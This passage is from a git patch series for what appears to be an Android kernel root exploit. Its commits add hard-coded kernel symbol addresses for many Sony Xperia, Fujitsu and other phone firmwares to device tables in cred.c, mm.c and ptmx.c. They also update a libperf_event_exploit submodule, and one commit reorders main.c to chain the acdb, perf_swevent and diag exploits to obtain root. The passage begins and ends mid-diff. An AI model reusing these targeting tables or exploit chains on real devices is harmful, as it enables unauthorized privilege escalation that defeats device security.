b/ptmx.c @@ -27,6 +27,7 @@ static supported_device supported_devices[] = { { DEVICE_SH04E_01_00_03, 0xc0eed190 }, { DEVICE_SGP321_10_1_1_A_1_307, 0xc0d36740 }, { DEVICE_SGP312_10_1_C_0_370, 0xc0d35ca8 }, + { DEVICE_SGP311_10_1_C_0_370, 0xc0d35ca8 }, { DEVICE_SO01E_9_1_C_0_473, 0xc0d03208 }, { DEVICE_SO02E_10_1_D_0_343, 0xc0e38620 }, { DEVICE_SO03E_10_1_E_0_265, 0xc0d36aa8 }, From 4f8abf8cd72672b418a677065da39b910f53e520 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 22 Jun 2013 03:50:58 +0530 Subject: [PATCH 010/125] no need to worry about customizations, seems that for a particular firmware all customizations have the same zImage --- cred.c | 12 ++++++------ device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 12 ++++++------ ptmx.c | 12 ++++++------ 5 files changed, 20 insertions(+), 20 deletions(-) diff --git a/cred.c b/cred.c index af15dfb..5f835cf 100644 --- a/cred.c +++ b/cred.c @@ -43,12 +43,12 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_07_970_4, 0xc00b26a0, 0xc00b218c }, { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, { DEVICE_LG_E975_V10e, 0xc00a0f90, 0xc00a0b6c }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, - { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, - { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, + { DEVICE_LT26W_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, + { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, + { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C5302_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index 9e38b54..eaa3e7e 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 9e38b54ae3adbc765cb6cfa0e497d4c3c4452703 +Subproject commit eaa3e7e370fc3341ac01c436c4de08a40408a77c diff --git a/libperf_event_exploit b/libperf_event_exploit index bb520f8..83f94f6 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit bb520f8eb85f7b2baa0e04b3a811471508dfd7ea +Subproject commit 83f94f6ae82f3a4e9d6fc3efcd53dc3db1d33e55 diff --git a/mm.c b/mm.c index f82e0ce..027ea6f 100644 --- a/mm.c +++ b/mm.c @@ -29,12 +29,12 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_07_970_4, 0xc0128b28 }, { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, { DEVICE_LG_E975_V10e, 0xc0116598 }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0136294 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0135650 }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0109894 }, - { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0109894 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc011445c }, - { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc0112668 }, + { DEVICE_LT26W_6_2_B_0_200, 0xc0136294 }, + { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, + { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, + { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, + { DEVICE_C5302_12_0_A_1_284, 0xc011445c }, + { DEVICE_C6503_10_3_A_0_423, 0xc0112668 }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index b0120f8..d30edc2 100644 --- a/ptmx.c +++ b/ptmx.c @@ -41,12 +41,12 @@ static supported_device supported_devices[] = { { DEVICE_HTL22_1_07_970_4, 0xc0df52bc }, { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, { DEVICE_LG_E975_V10e, 0xc0f9da70 }, - { DEVICE_LT26W_1265_3909_6_2_B_0_200, 0xc0cc3dc0 }, - { DEVICE_LT26I_1257_8080_6_2_B_0_211, 0xc0cc37e8 }, - { DEVICE_C6603_1269_5309_10_1_1_A_1_307, 0xc0d37488 }, - { DEVICE_C6603_1275_1562_10_1_1_A_1_253, 0xc0d37488 }, - { DEVICE_C5302_1272_1092_12_0_A_1_284, 0xc0e3bed8 }, - { DEVICE_C6503_1266_7597_10_3_A_0_423, 0xc0e46ce0 }, + { DEVICE_LT26W_6_2_B_0_200, 0xc0cc3dc0 }, + { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, + { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, + { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 }, + { DEVICE_C5302_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_C6503_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From bdb0a3b18191d5ac5e626d4012bea0a7563d2cc0 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 22 Jun 2013 03:59:13 +0530 Subject: [PATCH 011/125] add compatibility with device variants, seems that for a particular firmware all closely related device variants have the same zImage --- cred.c | 6 ++++++ device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 6 ++++++ ptmx.c | 6 ++++++ 5 files changed, 20 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 5f835cf..fcb39f1 100644 --- a/cred.c +++ b/cred.c @@ -46,9 +46,15 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C6602_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, + { DEVICE_C6602_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C5302_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_C5303_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, + { DEVICE_C5306_12_0_A_1_284, 0xc009ec08, 0xc009e72c }, { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, + { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, + { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index eaa3e7e..db39291 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit eaa3e7e370fc3341ac01c436c4de08a40408a77c +Subproject commit db3929157e25c1c19133b3b17535409e6751e6b8 diff --git a/libperf_event_exploit b/libperf_event_exploit index 83f94f6..db48be8 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 83f94f6ae82f3a4e9d6fc3efcd53dc3db1d33e55 +Subproject commit db48be85baf8d03ef1421b03eaaea924c5463d7b diff --git a/mm.c b/mm.c index 027ea6f..3119936 100644 --- a/mm.c +++ b/mm.c @@ -32,9 +32,15 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_6_2_B_0_200, 0xc0136294 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, + { DEVICE_C6602_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, + { DEVICE_C6602_10_1_1_A_1_253, 0xc0109894 }, { DEVICE_C5302_12_0_A_1_284, 0xc011445c }, + { DEVICE_C5303_12_0_A_1_284, 0xc011445c }, + { DEVICE_C5306_12_0_A_1_284, 0xc011445c }, { DEVICE_C6503_10_3_A_0_423, 0xc0112668 }, + { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, + { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index d30edc2..58b5e2e 100644 --- a/ptmx.c +++ b/ptmx.c @@ -44,9 +44,15 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_6_2_B_0_200, 0xc0cc3dc0 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, + { DEVICE_C6602_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 }, + { DEVICE_C6602_10_1_1_A_1_253, 0xc0d37488 }, { DEVICE_C5302_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_C5303_12_0_A_1_284, 0xc0e3bed8 }, + { DEVICE_C5306_12_0_A_1_284, 0xc0e3bed8 }, { DEVICE_C6503_10_3_A_0_423, 0xc0e46ce0 }, + { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, + { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From 1f00745d9dda8edf44b2d7f4f908f96a2754eb31 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Sat, 22 Jun 2013 04:02:29 +0530 Subject: [PATCH 012/125] added support for Xperia T (LT30p) 9.1.A.1.141 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index fcb39f1..7372a04 100644 --- a/cred.c +++ b/cred.c @@ -55,6 +55,7 @@ static supported_device supported_devices[] = { { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, + { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c}, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index db39291..bd03738 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit db3929157e25c1c19133b3b17535409e6751e6b8 +Subproject commit bd037381cd521d10c7b1bb07b2cd4ff4e26ca4a1 diff --git a/libperf_event_exploit b/libperf_event_exploit index db48be8..0fa2096 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit db48be85baf8d03ef1421b03eaaea924c5463d7b +Subproject commit 0fa209600ccd23a8473c09f0e5eda4a1dc67e7b4 diff --git a/mm.c b/mm.c index 3119936..8557fb0 100644 --- a/mm.c +++ b/mm.c @@ -41,6 +41,7 @@ static supported_device supported_devices[] = { { DEVICE_C6503_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, + { DEVICE_LT30P_9_1_A_1_141, 0xc01096e4 }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index 58b5e2e..beab5d7 100644 --- a/ptmx.c +++ b/ptmx.c @@ -53,6 +53,7 @@ static supported_device supported_devices[] = { { DEVICE_C6503_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, + { DEVICE_LT30P_9_1_A_1_141, 0xc0d02b00}, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From e04669d3bebf567fa809e4574fd20dc5f94b5961 Mon Sep 17 00:00:00 2001 From: sj8023ld Date: Sun, 23 Jun 2013 08:36:34 +0800 Subject: [PATCH 013/125] add LT29i 9.1.B.1.67 --- cred.c | 1 + mm.c | 1 + ptmx.c | 1 + 3 files changed, 3 insertions(+) diff --git a/cred.c b/cred.c index 7372a04..5c2e59a 100644 --- a/cred.c +++ b/cred.c @@ -56,6 +56,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c}, + { DEVICE_LT29i_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/mm.c b/mm.c index 8557fb0..da3a4df 100644 --- a/mm.c +++ b/mm.c @@ -42,6 +42,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, { DEVICE_LT30P_9_1_A_1_141, 0xc01096e4 }, + { DEVICE_LT29i_9_1_B_1_67, 0xc010aaec }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index beab5d7..038a8d0 100644 --- a/ptmx.c +++ b/ptmx.c @@ -54,6 +54,7 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_LT30P_9_1_A_1_141, 0xc0d02b00}, + { DEVICE_LT29i_9_1_B_1_67, 0xc0d01f60 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From 59e101890662426a322d8fd869ada31e65276e56 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sun, 23 Jun 2013 14:30:04 +0900 Subject: [PATCH 014/125] attempt diag_exploit last because it is not stable. Try stable one first. --- main.c | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/main.c b/main.c index b4ff50e..440ec94 100644 --- a/main.c +++ b/main.c @@ -74,20 +74,20 @@ run_exploit(void) ptmx_fsync_address = ptmx_fops_address + 0x38; - if (attempt_diag_exploit(ptmx_fsync_address)) { + printf("Attempt acdb exploit...\n"); + if (attempt_acdb_exploit(ptmx_fsync_address, 0)) { return true; } printf("\n"); - printf("Attempt acdb exploit...\n"); - if (attempt_acdb_exploit(ptmx_fsync_address, 0)) { + printf("Attempt perf_swevent exploit...\n"); + if (perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege, + run_obtain_root_privilege, NULL)) { return true; } printf("\n"); - printf("Attempt perf_swevent exploit...\n"); - return perf_swevent_run_exploit(ptmx_fsync_address, (int)&obtain_root_privilege, - run_obtain_root_privilege, NULL); + return attempt_diag_exploit(ptmx_fsync_address); } int From 459f673bba9de0bb7f190b91b9c7e11a3decc58b Mon Sep 17 00:00:00 2001 From: fi01 Date: Sun, 23 Jun 2013 14:33:52 +0900 Subject: [PATCH 015/125] Add FJL21 V23R39X --- device_database | 2 +- libperf_event_exploit | 2 +- ptmx.c | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index bd03738..724b7ec 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit bd037381cd521d10c7b1bb07b2cd4ff4e26ca4a1 +Subproject commit 724b7ec5f363b6071d0f99cab3649240b7a13978 diff --git a/libperf_event_exploit b/libperf_event_exploit index 0fa2096..61d0b16 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 0fa209600ccd23a8473c09f0e5eda4a1dc67e7b4 +Subproject commit 61d0b16670c02dd7cd06869e564ce1827ef17533 diff --git a/ptmx.c b/ptmx.c index 038a8d0..b900746 100644 --- a/ptmx.c +++ b/ptmx.c @@ -11,6 +11,7 @@ static supported_device supported_devices[] = { { DEVICE_F10D_V21R48A, 0xc09a60dc + 4 }, { DEVICE_F11D_V24R40A, 0xc1056998 }, + { DEVICE_FJL21_V23R39X, 0xc0ee31f8 }, { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 }, { DEVICE_SCL21_LJD, 0xc0c71dc0 }, { DEVICE_SC01E_LJ3, 0xc10a5a48 }, From 8adc5fe04673337b997be85ac6c7e0f22047fdeb Mon Sep 17 00:00:00 2001 From: fi01 Date: Sun, 23 Jun 2013 16:32:28 +0900 Subject: [PATCH 016/125] Add FJL21 V37R47A --- device_database | 2 +- libperf_event_exploit | 2 +- ptmx.c | 1 + 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/device_database b/device_database index 724b7ec..e8b02d0 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 724b7ec5f363b6071d0f99cab3649240b7a13978 +Subproject commit e8b02d0b57f162b47341c072e704091225641964 diff --git a/libperf_event_exploit b/libperf_event_exploit index 61d0b16..c1f8fcd 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 61d0b16670c02dd7cd06869e564ce1827ef17533 +Subproject commit c1f8fcd7fcccbdb962339bf54c6784d88aa6d0b2 diff --git a/ptmx.c b/ptmx.c index b900746..087d6a0 100644 --- a/ptmx.c +++ b/ptmx.c @@ -12,6 +12,7 @@ static supported_device supported_devices[] = { { DEVICE_F11D_V24R40A, 0xc1056998 }, { DEVICE_FJL21_V23R39X, 0xc0ee31f8 }, + { DEVICE_FJL21_V37R47A, 0xc0ee3378 }, { DEVICE_ISW12K_010_0_3000, 0xc0dc0a10 }, { DEVICE_SCL21_LJD, 0xc0c71dc0 }, { DEVICE_SC01E_LJ3, 0xc10a5a48 }, From d22ca259acef4b8ec6c35e8e3bedd3e965e77524 Mon Sep 17 00:00:00 2001 From: fi01 Date: Sun, 23 Jun 2013 16:43:40 +0900 Subject: [PATCH 017/125] Added LT29i 9.1.B.0.411 --- cred.c | 5 +++-- device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 3 ++- ptmx.c | 3 ++- 5 files changed, 9 insertions(+), 6 deletions(-) diff --git a/cred.c b/cred.c index 5c2e59a..32a7285 100644 --- a/cred.c +++ b/cred.c @@ -55,8 +55,9 @@ static supported_device supported_devices[] = { { DEVICE_C6503_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6502_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, { DEVICE_C6506_10_3_A_0_423, 0xc009ae60, 0xc009a984 }, - { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c}, - { DEVICE_LT29i_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 }, + { DEVICE_LT30P_9_1_A_1_141, 0xc0094878, 0xc009439c }, + { DEVICE_LT29I_9_1_B_0_411, 0xc0095dec, 0xc0095910 }, + { DEVICE_LT29I_9_1_B_1_67, 0xc0095ca4, 0xc00957c8 }, { DEVICE_N05E_A1000311, 0xc0094430, 0xc0093ebc }, }; diff --git a/device_database b/device_database index e8b02d0..a0be2cd 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit e8b02d0b57f162b47341c072e704091225641964 +Subproject commit a0be2cdc12a1228099691b6a0583670976805492 diff --git a/libperf_event_exploit b/libperf_event_exploit index c1f8fcd..0e20dc1 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit c1f8fcd7fcccbdb962339bf54c6784d88aa6d0b2 +Subproject commit 0e20dc15c385b29a635c3a87d0d7f44cfa954ffb diff --git a/mm.c b/mm.c index da3a4df..900c5d8 100644 --- a/mm.c +++ b/mm.c @@ -42,7 +42,8 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0112668 }, { DEVICE_C6506_10_3_A_0_423, 0xc0112668 }, { DEVICE_LT30P_9_1_A_1_141, 0xc01096e4 }, - { DEVICE_LT29i_9_1_B_1_67, 0xc010aaec }, + { DEVICE_LT29I_9_1_B_0_411, 0xc010ac30 }, + { DEVICE_LT29I_9_1_B_1_67, 0xc010aaec }, { DEVICE_N05E_A1000311, 0xc0105800 }, }; diff --git a/ptmx.c b/ptmx.c index 087d6a0..c134b33 100644 --- a/ptmx.c +++ b/ptmx.c @@ -56,7 +56,8 @@ static supported_device supported_devices[] = { { DEVICE_C6502_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_C6506_10_3_A_0_423, 0xc0e46ce0 }, { DEVICE_LT30P_9_1_A_1_141, 0xc0d02b00}, - { DEVICE_LT29i_9_1_B_1_67, 0xc0d01f60 }, + { DEVICE_LT29I_9_1_B_0_411, 0xc0d01f60 }, + { DEVICE_LT29I_9_1_B_1_67, 0xc0d01f60 }, { DEVICE_N05E_A1000311, 0xc0f58700 }, }; From 29dd41ca62ecc3ed3051b7de3b650b33b5f77781 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 03:52:45 +0530 Subject: [PATCH 018/125] added support for Xperia SL (LT26ii) 6.2.B.0.211 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 32a7285..a640e60 100644 --- a/cred.c +++ b/cred.c @@ -45,6 +45,7 @@ static supported_device supported_devices[] = { { DEVICE_LG_E975_V10e, 0xc00a0f90, 0xc00a0b6c }, { DEVICE_LT26W_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, + { DEVICE_LT26II_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, diff --git a/device_database b/device_database index a0be2cd..8f02c42 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit a0be2cdc12a1228099691b6a0583670976805492 +Subproject commit 8f02c42541e29787277e879b33b937662e617b72 diff --git a/libperf_event_exploit b/libperf_event_exploit index 0e20dc1..ca9e38a 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 0e20dc15c385b29a635c3a87d0d7f44cfa954ffb +Subproject commit ca9e38aededa7bfd41a6b28671330117607d0a88 diff --git a/mm.c b/mm.c index 900c5d8..b695c0c 100644 --- a/mm.c +++ b/mm.c @@ -31,6 +31,7 @@ static supported_device supported_devices[] = { { DEVICE_LG_E975_V10e, 0xc0116598 }, { DEVICE_LT26W_6_2_B_0_200, 0xc0136294 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, + { DEVICE_LT26II_6_2_B_0_211, 0xc0135650 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, diff --git a/ptmx.c b/ptmx.c index c134b33..9745a9c 100644 --- a/ptmx.c +++ b/ptmx.c @@ -45,6 +45,7 @@ static supported_device supported_devices[] = { { DEVICE_LG_E975_V10e, 0xc0f9da70 }, { DEVICE_LT26W_6_2_B_0_200, 0xc0cc3dc0 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, + { DEVICE_LT26II_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0d37488 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0d37488 }, From 061dce30656ba47ab899eee5629e0d076cb12ac5 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 03:57:44 +0530 Subject: [PATCH 019/125] added support for Xperia Acros S (LT26w) 6.2.B.0.211 --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index a640e60..84b47bb 100644 --- a/cred.c +++ b/cred.c @@ -44,6 +44,7 @@ static supported_device supported_devices[] = { { DEVICE_HTX21_1_20_971_1, 0xc00a6e54, 0xc00a6940 }, { DEVICE_LG_E975_V10e, 0xc00a0f90, 0xc00a0b6c }, { DEVICE_LT26W_6_2_B_0_200, 0xc00b261c, 0xc00b2140 }, + { DEVICE_LT26W_6_2_B_0_211, 0xc00b262c, 0xc00b2150 }, { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_LT26II_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, diff --git a/device_database b/device_database index 8f02c42..1278dbc 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 8f02c42541e29787277e879b33b937662e617b72 +Subproject commit 1278dbc2b7cea92b9777d3bd709de92abbba6448 diff --git a/libperf_event_exploit b/libperf_event_exploit index ca9e38a..1ca8c62 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit ca9e38aededa7bfd41a6b28671330117607d0a88 +Subproject commit 1ca8c62c577b1b9d105cfa8d8e1a07e4ba2b5bcc diff --git a/mm.c b/mm.c index b695c0c..6ceb298 100644 --- a/mm.c +++ b/mm.c @@ -30,6 +30,7 @@ static supported_device supported_devices[] = { { DEVICE_HTX21_1_20_971_1, 0xc00fa8b0 }, { DEVICE_LG_E975_V10e, 0xc0116598 }, { DEVICE_LT26W_6_2_B_0_200, 0xc0136294 }, + { DEVICE_LT26W_6_2_B_0_211, 0xc01362a4 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0135650 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, diff --git a/ptmx.c b/ptmx.c index 9745a9c..b17ff91 100644 --- a/ptmx.c +++ b/ptmx.c @@ -44,6 +44,7 @@ static supported_device supported_devices[] = { { DEVICE_HTX21_1_20_971_1, 0xc0ccc0b4 }, { DEVICE_LG_E975_V10e, 0xc0f9da70 }, { DEVICE_LT26W_6_2_B_0_200, 0xc0cc3dc0 }, + { DEVICE_LT26W_6_2_B_0_211, 0xc0b86ef0 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0cc37e8 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0d37488 }, From 2cdd56875d1e5923a72b2eb1cc543cb859557746 Mon Sep 17 00:00:00 2001 From: DooMLoRD Date: Mon, 24 Jun 2013 04:00:53 +0530 Subject: [PATCH 020/125] added support for Xperia P (LT22i) 6.2.A.1.100 (thanks to the_laser) --- cred.c | 1 + device_database | 2 +- libperf_event_exploit | 2 +- mm.c | 1 + ptmx.c | 1 + 5 files changed, 5 insertions(+), 2 deletions(-) diff --git a/cred.c b/cred.c index 84b47bb..03347a2 100644 --- a/cred.c +++ b/cred.c @@ -47,6 +47,7 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_6_2_B_0_211, 0xc00b262c, 0xc00b2150 }, { DEVICE_LT26I_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, { DEVICE_LT26II_6_2_B_0_211, 0xc00b19d8, 0xc00b14fc }, + { DEVICE_LT22I_6_2_A_1_100 , 0xc00c37c8 ,0xc00c33f8}, { DEVICE_C6603_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0093dd4, 0xc00938f8 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0093dd4, 0xc00938f8 }, diff --git a/device_database b/device_database index 1278dbc..58124a2 160000 --- a/device_database +++ b/device_database @@ -1 +1 @@ -Subproject commit 1278dbc2b7cea92b9777d3bd709de92abbba6448 +Subproject commit 58124a2c162664843bcbb86cd164219ed0089a2c diff --git a/libperf_event_exploit b/libperf_event_exploit index 1ca8c62..4666b41 160000 --- a/libperf_event_exploit +++ b/libperf_event_exploit @@ -1 +1 @@ -Subproject commit 1ca8c62c577b1b9d105cfa8d8e1a07e4ba2b5bcc +Subproject commit 4666b4184f330b0437e017a6bd168f9f84ac2b40 diff --git a/mm.c b/mm.c index 6ceb298..4baddc2 100644 --- a/mm.c +++ b/mm.c @@ -33,6 +33,7 @@ static supported_device supported_devices[] = { { DEVICE_LT26W_6_2_B_0_211, 0xc01362a4 }, { DEVICE_LT26I_6_2_B_0_211, 0xc0135650 }, { DEVICE_LT26II_6_2_B_0_211, 0xc0135650 }, + { DEVICE_LT22I_6_2_A_1_100, 0xc0136358 }, { DEVICE_C6603_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6602_10_1_1_A_1_307, 0xc0109894 }, { DEVICE_C6603_10_1_1_A_1_253, 0xc0109894 }, diff --git a/ptmx.c b/ptmx.c index b17ff91..10ac620 100644 --- a/ptmx.c +++ b/ptmx.c @@ -47,6 +47,7 @@ static supported_device 